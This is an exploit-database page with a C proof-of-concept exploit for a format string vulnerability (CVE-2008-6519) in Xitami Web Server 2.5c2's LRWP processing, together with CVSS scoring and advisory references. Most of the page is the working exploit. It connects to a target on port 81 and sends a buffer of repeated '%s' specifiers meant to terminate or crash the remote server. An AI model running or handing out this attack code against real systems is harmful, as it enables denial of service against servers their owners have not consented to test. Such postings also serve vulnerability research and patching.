Xitami Web Server v2.5c2 LRWP Processing Format String PoC

2009.03.26
Credit: bratax
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6519
CWE: CWE-134


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/** * * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug * Advisory is available at: http://www.bratax.be/advisories/b013.html * (multiple vulnerabilities! check it out!) * * @author: bratax * @url: http://www.bratax.be/ * @email: bratax@gmail.com * * Thanks to BuzzDee for learning me how to use reverse code engineering to * find bugs & thanks to DiabloHorn as well ;-) * Greetz to NR! * **/ #include <stdio.h> #include <string.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define PORT 81 // target port int main(int argc, char *argv[]){ int sockfd; struct hostent *he; struct sockaddr_in their_addr; WSADATA wsaData; char formatstring[250]; if (argc != 2){ printf("\nXitami Web Server 2.5c2\n" ); printf("Format String PoC by bratax - http://www.bratax.be/\n\n"); printf("[+] tested on WinXP Pro SP2 & Vista\n"); printf("[+] usage: %s <hostname>\n\n", argv[0]); return -1; } if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) { fprintf(stderr, "WSAStartup failed.\n"); return -1; } if ((he=gethostbyname(argv[1])) == NULL){ // get the host info perror("gethoscattbyname"); return -1; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); return -1; } their_addr.sin_family = AF_INET; // host byte order their_addr.sin_port = htons(PORT); // short, network byte order their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){ printf("[-] Connect failed.\n"); closesocket(sockfd); return -1; } printf("[+] Server is listening...\n"); Sleep(1000); /* setup format string request: %s*100 + \xFF + somestring + \xFF (program termination) or: %n + \xFF + somestring + \xFF (program crash) */ memset(formatstring,'\x41', sizeof(formatstring)); for (int i = 0; i<200; i+=2){ memcpy(formatstring+i, "%s", 2); } memcpy(formatstring+200, "\xFF", 1); memcpy(formatstring+249, "\xFF", 1); printf("[+] Sending format string request..."); Sleep(2000); if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) { Sleep(2000); printf("failed! Exiting...\n"); closesocket(sockfd); WSACleanup(); return -1; } Sleep(2000); closesocket(sockfd); printf("done.\n"); return 0; }

References:

http://xforce.iss.net/xforce/xfdb/41644
http://www.securityfocus.com/bid/28603
http://www.milw0rm.com/exploits/5354
http://www.bratax.be/advisories/b013.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top